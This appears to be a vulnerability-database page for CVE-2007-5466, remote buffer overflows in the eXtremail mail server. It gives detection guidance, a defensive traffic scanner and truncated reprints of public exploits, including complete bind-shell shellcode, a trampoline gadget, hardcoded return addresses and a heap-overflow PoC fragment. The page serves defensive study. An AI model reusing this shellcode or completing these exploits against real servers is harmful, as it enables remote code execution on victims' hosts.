CVE-2007-5466
Published: 2007-10-15
Priority: P258 · Severity: critical · CVSS 2.0 base score 10.0 · vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available
EPSS: 19.89% (97.1th percentile)
Multiple buffer overflows in eXtremail 2.1.1 and earlier allow remote attackers to (1) have an unknown impact by sending multiple long strings to the IMAP port (143/tcp); (2) execute arbitrary code via a long string in an IMAP AUTHENTICATE PLAIN action, involving the ifParseAuthPlain function; (3) execute arbitrary code via a long LOGIN command to the admin interface port (4501/tcp); or (4) execute arbitrary code via a long string in an IMAP AUTHENTICATE LOGIN (aka CRAM-MD5 authentication) action, involving the ifProcImapAuth1 function.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extremail | extremail | <= 2.1.1 | — |
Detection & IOCs (extracted from sources)
Bytes (Linux x86 bind shellcode listening on 4444/tcp, shared by extremail-v4.c and extremail-v6.c):
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
Bytes (stack trampoline from extremail-v6.c: mov 0x08(%esp),%eax; inc %eax; jmp *%eax):
\x8b\x44\x24\x08\x40\xff\xe0
Detection
- IMAP AUTHENTICATE PLAIN overflow (ifParseAuthPlain): monitor 143/tcp for an oversized base64-encoded SASL response sent immediately after the '1 AUTHENTICATE PLAIN' command. Decode before measuring: base64 inflates the real payload by a factor of 4/3.
- IMAP AUTHENTICATE LOGIN overflow (ifProcImapAuth1): monitor 143/tcp for oversized responses to the server's authentication challenge. The CVE text calls this mechanism CRAM-MD5; both LOGIN and CRAM-MD5 are challenge/response mechanisms, so the oversized data arrives in the reply to the server's '+' continuation rather than on the command line itself.
- Admin interface overflow: monitor 4501/tcp for oversized LOGIN commands; the exploit sends 'LOGIN <large_buf> digit-labs.org\n'.
- Post-exploitation: the bind shellcode opens a listening shell on 4444/tcp; alert on unexpected inbound connections to port 4444 on eXtremail server hosts.
- Shellcode signature: the Linux bind shellcode contains the byte sequence \x66\x68\x11\x5c (pushw $0x5c11, which places 0x115c = 4444 in network byte order into the sockaddr passed to bind); scan network captures of IMAP and admin-port traffic for this sequence.
- Heap overflow PoC: the payload starts with a NUL byte followed by 0x2710-1 NOP bytes, then repeats 0x2710-byte NOP blocks in a loop; detect abnormally large data bursts within a single IMAP session on 143/tcp.
Exploit notes
- The exploit targets two specific eXtremail versions with hardcoded return addresses: the fp value 0x08216357 is for version 2.1.1 and 0x08216377 for version 2.1.0 (tar.gz builds). These addresses will not be valid for other builds or distributions.
- The AUTHENTICATE PLAIN exploit uses a fixed 256-byte overflow payload; the admin LOGIN exploit uses 788 bytes. Size-based detection thresholds should account for these values; a legitimate PLAIN response is only a few dozen bytes.
- The return pointer for the admin LOGIN exploit (extremail-v4.c) was found with objdump -D smtpd | grep "ff e4" (a jmp *%esp gadget), so the fp values are specific to the unmodified tar.gz binaries of eXtremail 2.1.1 and 2.1.0.
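The detection bullets above describe three traffic patterns (oversized SASL responses after AUTHENTICATE, oversized LOGIN arguments on the admin port, and the bind-shellcode byte signature) plus the heap PoC's filler bursts. The following is an added example, not code from this page, from eXtremail or from digit-labs: a small offline scanner that applies those rules to the client-to-server bytes of one captured session. The thresholds (256, 788, 0x2710-1) and the shellcode fragment come from the notes above; the function names, the tuple format of the findings and the sample sessions are constructed for the example.

```python
import base64
import binascii
import re

# Added example, not code from the page, eXtremail or digit-labs: an offline
# detector for the IOC bullets above. Input is the client->server byte stream
# of one TCP session to 143/tcp (IMAP) or 4501/tcp (admin interface).

# Fragment of the exploits' Linux x86 bind shellcode: 66 68 11 5c is
# pushw $0x5c11, leaving bytes 11 5c on the stack, i.e. port 4444 in network
# byte order inside the sockaddr later handed to bind().
BIND_PORT_PUSH = b"\x66\x68\x11\x5c"
# Sizes named in the IOC bullets: 256-byte AUTHENTICATE buffer, 788-byte admin
# LOGIN buffer, and the heap PoC's NUL followed by 0x2710-1 filler bytes.
AUTH_RESP_MAX = 256
ADMIN_LOGIN_MAX = 788
FILLER_RUN = 0x2710 - 1

AUTH_CMD_RE = re.compile(rb"^\S+ AUTHENTICATE (PLAIN|LOGIN|CRAM-MD5)\s*$", re.I)
TAGGED_CMD_RE = re.compile(rb"^\S+ [A-Za-z]+")

def shellcode_port(data):
    """Port encoded by the shellcode's pushw if the signature occurs in data."""
    i = data.find(BIND_PORT_PUSH)
    return None if i < 0 else int.from_bytes(data[i + 2:i + 4], "big")

def decode_resp(line):
    """SASL response decoded from base64, or None if the line is not base64.
    Base64 grows 3 bytes to 4 (the exploit's BUF_SIZE/3*4+1 encoded buffer),
    so decoding recovers the real length that reaches the server-side buffer."""
    try:
        return base64.b64decode(line.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None

def filler_burst(stream):
    """Offset of the first run of FILLER_RUN identical bytes, else None
    (the PoC uses 0x41, but any byte value is matched)."""
    m = re.search(rb"(.)\1{%d,}" % (FILLER_RUN - 1), stream, re.S)
    return m.start() if m else None

def scan_imap(stream):
    """Findings for 143/tcp as (kind, detail, value) tuples: oversized SASL
    responses after AUTHENTICATE, the bind-shellcode signature inside a
    decoded response, and the heap PoC's filler burst."""
    findings = []
    lines = stream.split(b"\n")
    for n, line in enumerate(lines):
        m = AUTH_CMD_RE.match(line.strip())
        if not m:
            continue
        mech = m.group(1).decode().upper()
        # Every client line up to the next tagged command is SASL data: one
        # line for PLAIN, challenge responses for LOGIN and CRAM-MD5.
        for resp in lines[n + 1:]:
            if TAGGED_CMD_RE.match(resp):
                break
            payload = decode_resp(resp)
            if payload is None:
                continue
            if len(payload) > AUTH_RESP_MAX:
                findings.append(("imap", mech, len(payload)))
            port = shellcode_port(payload)
            if port is not None:
                findings.append(("imap", "bind-shellcode", port))
    off = filler_burst(stream)
    if off is not None:
        findings.append(("imap", "filler-burst", off))
    return findings

def scan_admin(stream):
    """Findings for 4501/tcp: LOGIN arguments longer than the buffer (the
    exploit sends 'LOGIN <large_buf> digit-labs.org\\n') and the signature."""
    findings = []
    for line in stream.split(b"\n"):
        if line[:6].upper() != b"LOGIN ":
            continue
        arg = line[6:]
        if len(arg) > ADMIN_LOGIN_MAX:
            findings.append(("admin", "LOGIN", len(arg)))
        port = shellcode_port(arg)
        if port is not None:
            findings.append(("admin", "bind-shellcode", port))
    return findings

# Constructed sample sessions, not real captures. SHELLCODE_HEAD is the first
# 32 bytes of the page's bind shellcode; FAKE_RET is the 2.1.1 fp value
# 0x08216357 from the exploit notes, little-endian.
SHELLCODE_HEAD = (b"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
                  b"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56")
FAKE_RET = b"\x57\x63\x21\x08"
BENIGN_IMAP = (b"a1 CAPABILITY\na2 AUTHENTICATE PLAIN\n"
               + base64.b64encode(b"\0alice\0s3cret") + b"\na3 SELECT INBOX\n")
EXPLOIT_IMAP = (b"1 AUTHENTICATE PLAIN\n"
                + base64.b64encode(b"\x41" * 300 + SHELLCODE_HEAD + FAKE_RET) + b"\n")
HEAP_IMAP = b"\x00" + b"\x41" * FILLER_RUN
BENIGN_ADMIN = b"LOGIN admin s3cret\n"
EXPLOIT_ADMIN = b"LOGIN " + b"\x41" * 1000 + b" digit-labs.org\n"

if __name__ == "__main__":
    for name, port, session in (("benign", 143, BENIGN_IMAP), ("exploit", 143, EXPLOIT_IMAP),
                                ("heap-poc", 143, HEAP_IMAP), ("benign", 4501, BENIGN_ADMIN),
                                ("exploit", 4501, EXPLOIT_ADMIN)):
        scanner = scan_imap if port == 143 else scan_admin
        print(name, port, scanner(session))
```

The scanner only sees client-to-server data, so a real deployment must reassemble each direction of the TCP session separately (for example from a pcap) before calling it. Measuring the decoded SASL response rather than the raw line is the point of decode_resp: the exploit's 2048-byte send buffer is base64 text, and the 256-byte figure in the notes refers to what the server sees after decoding.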
No detection rules found.
Exploit-DB · 2007-10-15 · tagged CVE-2007-5467
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
```c
/* extremail-v6.c
 *
 * Copyright (c) 2006 by
 *
 * eXtremail
 * (author name and the rest of the header comment were lost in extraction)
 */
/* the include names were stripped in extraction; the standard socket
 * headers an exploit of this shape needs are restored here */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1 /* base64 expands 3 bytes to 4, plus NUL */
#define NOP 0x41                 /* filler byte (inc %ecx), not 0x90 */
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444          /* port the bind shellcode listens on */
/* trampoline: returning into this jumps to the pointer found at esp+8, plus one */
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40"             /* inc %eax */
"\xff\xe0";        /* jmp *%eax */
/* Linux x86 bind shell on PORT_SHELL; \x66\x68\x11\x5c pushes 0x115c = 4444 */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
/* listing truncated in source; the last two shellcode lines above are
 * completed from the identical array in extremail-v4.c below. Full file:
 * http://www.digit-labs.org/files/exploits/extremail-v6.c */
```
Exploit-DB · 2007-10-15 · tagged CVE-2007-5467
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
---
```perl
#!/usr/bin/perl
#
# extremail-v8.pl
#
# Copyright (c) 2007 by
#
# eXtremail
# (author name, header, option parsing and the start of the send routine
#  were lost in extraction)
use Socket;    # inet_aton and sockaddr_in used in connect_host below

    print("-> * Connected\n");
    sleep(16);
    print("-> * Sending payload\n");
    # first block: a NUL byte followed by 0x2710-1 filler bytes
    $buf = "\x00".($NOP x (0x2710-1));
    send(SOCKET, $buf, 0);
    sleep($send_delay);
    # then $loop further blocks of 0x2710 filler bytes each
    $buf = $NOP x 0x2710;
    while ($loop--) {
        print("-> * Sending payload ".$loop."\n");
        send(SOCKET, $buf, 0);
        sleep($send_delay);
    }
    print("-> * Successfully sent payload!\n");
}
sub print_header {
    print("eXtremail \n");
    print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
    print(qq(Usage: $0 -t
    -t : hostname to test
    ));
    exit(1);
}
sub connect_host {
    ($target, $port) = @_;
    $iaddr = inet_aton($target) || die("Error: $!\n");
    $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    # socket(), connect() and the remainder of the script are truncated in the
    # source; full file: http://www.digit-labs.org/files/exploits/extremail-v8.pl
}
```
Exploit-DB · 2007-10-15 · tagged CVE-2007-5467
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
```c
/* extremail-v4.c
 *
 * Copyright (c) 2006 by
 *
 * eXtremail
 * (author name and the rest of the header comment were lost in extraction)
 */
/* the include names were stripped in extraction; the standard socket
 * headers an exploit of this shape needs are restored here */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUF_SIZE 8192
#define NOP 0x41             /* filler byte (inc %ecx), not 0x90 */
#define PAD 0                /* do you feel lucky? */
#define DEF_PORT 4501        /* eXtremail admin interface */
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444      /* port the bind shellcode listens on */
/* Linux x86 bind shell on PORT_SHELL; \x66\x68\x11\x5c pushes 0x115c = 4444 */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
/* per-build parameters for the two tar.gz builds (2.1.1 and 2.1.0); the
 * fp values 0x08216357 and 0x08216377 from the exploit notes above come
 * from objdump -D smtpd | grep "ff e4" */
struct target_t
{
    const char *name;
    const int len;
    const char *zshell;
    /* remaining fields, the target table and main() are truncated in the
     * source; full file: http://www.digit-labs.org/files/exploits/extremail-v4.c */
};
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/27220
- http://www.digit-labs.org/files/exploits/extremail-v4.c
- http://www.digit-labs.org/files/exploits/extremail-v5.c
- http://www.digit-labs.org/files/exploits/extremail-v6.c
- http://www.digit-labs.org/files/exploits/extremail-v8.pl
- http://www.securityfocus.com/archive/1/482293
- http://www.securityfocus.com/bid/26074
- https://exchange.xforce.ibmcloud.com/vulnerabilities/37209
- https://www.exploit-db.com/exploits/4533
- https://www.exploit-db.com/exploits/4534
- https://www.exploit-db.com/exploits/4535